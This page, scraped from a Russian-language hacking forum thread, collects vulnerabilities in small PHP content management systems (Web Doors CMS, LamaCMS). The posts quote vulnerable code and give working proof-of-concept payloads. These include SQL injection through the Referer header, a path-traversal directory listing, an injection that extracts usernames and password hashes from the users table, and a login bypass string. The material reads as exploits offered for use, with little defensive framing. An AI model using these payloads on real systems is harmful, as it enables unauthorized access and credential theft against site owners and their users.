[COLOR="#000000"][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strip_tags[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"articles (`id`, `pagename`, `text`, `summary`, `name`) VALUES ('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$summary[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][/COLOR]

Уязвимое поле: $_POST['id']

07.05.2011, 19:33

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Web Doors CMS

1. SQLi

File:/sys/visit_logger.php

mq = off

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$log_referrer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$checkPage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT lvp_id FROM[/COLOR][COLOR="#0000BB"]$logPagesTbl[/COLOR][COLOR="#DD0000"]WHERE lvp_page LIKE '[/COLOR][COLOR="#0000BB"]$log_page[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

PoC:

Код:

Code:
GET /index.php
Referer: http://blabla.com' or substring(version(),1,1)=5-- 1

2. Список файлов в директории

File:/sys/files/file_manager.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]])){

[/COLOR][COLOR="#0000BB"]$f_way[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$f_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$f_way[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];

...........................

[/COLOR][COLOR="#0000BB"]$f_dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]opendir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f_path[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

PoC: http://localhost/sys/files/file_manager.php?path=../..

#10

07.05.2011, 22:01

[RedSky]

Guest

Сообщений: n/a

Провел на форуме:
3598

Репутация: 10

LamaCMS

SQLi

Need: магия off, аккаунт юзера

./modules/pages/add1.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]'Add Page'[/COLOR][COLOR="#007700"];

    if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]))

    {

[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'textfield'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$author[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO pages (title,content,author) VALUES ('[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$author[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

    echo[/COLOR][COLOR="#DD0000"]'Your page has been added.'[/COLOR][COLOR="#007700"];

    }

    else

    {

    echo[/COLOR][COLOR="#DD0000"]'Not all fields are filled in correctly. Try again.'[/COLOR][COLOR="#007700"];

    }

[/COLOR][/COLOR]

Example:

Код:

Code:
http://localhost/lamacms/index1.php?inav=pages&modapp=add
Title: ololo', (select concat_ws(0x3a,username,password)as krasnoenebo from users limit 0,1), 'redsky')-- -

Либо напрямую шлем пост-запрос.

Идем смотреть пагу, в контенте будет вывод.

Authorization bypass

Need: магия в оффе

./index.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]switch (@[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]])

{

[/COLOR][COLOR="#FF8000"]//Case1: login form submitted

[/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]"login"[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM users WHERE username='[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#DD0000"]' AND password = md5('[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

    while ([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))

    {

[/COLOR][COLOR="#0000BB"]$membertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'membertype'[/COLOR][COLOR="#007700"]];

    }

[/COLOR][/COLOR]

Example:

Код:

Code:
login: a'or(1)#
password: =(

Также при добавлении и редактировании чего-либо имеются скули, но смысла в их выкладывании не вижу, т.к. имеются теже зависимости, что и в предыдущих багах.

Страница 44 из 52

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Библиотека	SladerNon	Болталка	17	05.02.2007 23:30

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ